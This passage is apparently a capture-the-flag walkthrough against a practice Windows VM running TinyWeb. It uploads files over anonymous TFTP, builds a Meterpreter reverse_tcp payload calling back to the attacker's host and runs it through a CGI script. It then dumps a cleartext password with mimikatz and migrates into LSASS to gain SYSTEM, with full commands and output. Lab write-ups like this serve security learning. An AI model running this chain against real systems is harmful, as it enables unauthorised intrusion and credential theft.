As we can see from the original
Nmap scan in Method 1, there is an FTP service which allows anonymous read access to part of the file system. Peeking inside the
root folders, gives us a good indication that this where the
TinyWeb service is running, however we have no write access.
Nmap scan showed the port 69 (TFTP) may be open.
[email protected]:~# nmap -n -sU -sV 192.168.127.130 69/udp open tftp? 1 service unrecognized despite returning data.
The problem with TFTP is there is no way to know which remote directory the service is bound to, and we therefore have no idea where the files are going to go. I created a very basic HTML page and uploaded it via TFTP.
Using the web service and the FTP access, I could confirm the file was written to the
[email protected]:~# vi test.html <html> <body> <p>This is a test.</p> </body> </html> [email protected]:~# tftp 192.168.127.130 tftp> put test.html Sent 58 bytes in 0.0 seconds [email protected]:~# ftp 192.168.127.130 ftp> ls root 200 Port command successful 150 Opening data channel for directory list. drwxr-xr-x 1 ftp ftp 0 Feb 08 2013 cgi-bin ---------- 1 ftp ftp 14539 Oct 31 2012 index.html ---------- 1 ftp ftp 63 May 16 13:56 test.html
I went and downloaded TinyWeb from RITLabs and found that within their download package, they had some example files for CGI applications.
I uploaded a few of these to the
cgi-bin folder via TFTP and execucated them via
[email protected]:~# cp scream/tinyweb/cgi/HELLO.PL /root/hello.pl [email protected]:~# tftp 192.168.127.130 tftp> put cgi-bin/hello.pl Sent 330 bytes in 0.0 seconds [email protected]:~# curl http://192.168.127.130/cgi-bin/hello.pl Hello, World!
The next test was to see if I could upload a CGI script that would run an executable (i.e. a Meterpreter payload…).
[email protected]:~# cp scream/tinyweb/cgi/helloexe.pl /root/exploit.pl change line --> print `exploit.exe`;
Now to make the exploit, but there’s an added complication. I found that normal PE32 executables created by msfpayload would not execute on the remote host, and if you examine the doscgi.exe file (in the cgi examples in the tinyweb download) you can see it’s an MS-DOS executable.
There’s no option in
msfencode to do this as far as I can tell, so it has to be done manually.
The first stage is to produce a raw payload.
[email protected]:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.127.127 R > exploit_raw
Then convert this into ASM format using Disassemble Ruby library.
[email protected]:~# ruby /usr/share/metasploit-framework/lib/metasm/samples/disassemble.rb /root/exploit_raw > /root/exploit_asm
There are two lines we have to manually add to the top of this file.
[email protected]:~# vi exploit_asm .section '.text' rwx .entrypoint
Then finally encode this into the final executable.
[email protected]:~# ruby /usr/share/metasploit-framework/lib/metasm/samples/peencode.rb /root/exploit_asm saved to file "a.out" [email protected]:~# mv a.out /root/exploit.exe [email protected]:~# file exploit.exe exploit.exe: MS-DOS executable, MZ for MS-DOS
Upload and Execute
Upload these two files via TFTP, then start the Metasploit Multi Hander.
[email protected]:~# tftp 192.168.127.130 tftp> put cgi-bin/exploit.pl Sent 538 bytes in 0.0 seconds tftp> put cgi-bin/exploit.exe Sent 1028 bytes in 0.0 seconds [email protected]:~# msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=192.168.127.127 E
I then used
cURL to execute the CGI script, which in turn executes the exe.
[email protected]:~# curl http://192.168.127.130/cgi-bin/exploit.pl [*] Sending stage (769536 bytes) to 192.168.127.130 [*] Meterpreter session 1 opened (192.168.127.127:4444 -> 192.168.127.130:1034)
meterpreter > getuid Server username: SCREAM\alex
Unlike in the previous method, where the SSH service was running as SYSTEM, the TinyWeb service is running as user
alex. This means that some privilege escalation is now required.
First I loaded the Mimikaz extension, to find alex’s password stored in memory. This wasn’t really necessary, as there aren’t any other services which I can authenticate to. I just did it for the sake of completeness.
meterpreter > load mimikatz meterpreter > wdigest 0;34668 NTLM SCREAM alex thisisaverylongpassword
All that’s required to elevate is to migrate the Meterpreter service into a process running as SYSTEM. I attempted to migrate into 644 LSASS.
meterpreter > migrate 664 [*] Migrating from 3272 to 664... [*] Migration completed successfully. meterpreter > getuid Server username: NT AUTHORITY\SYSTEM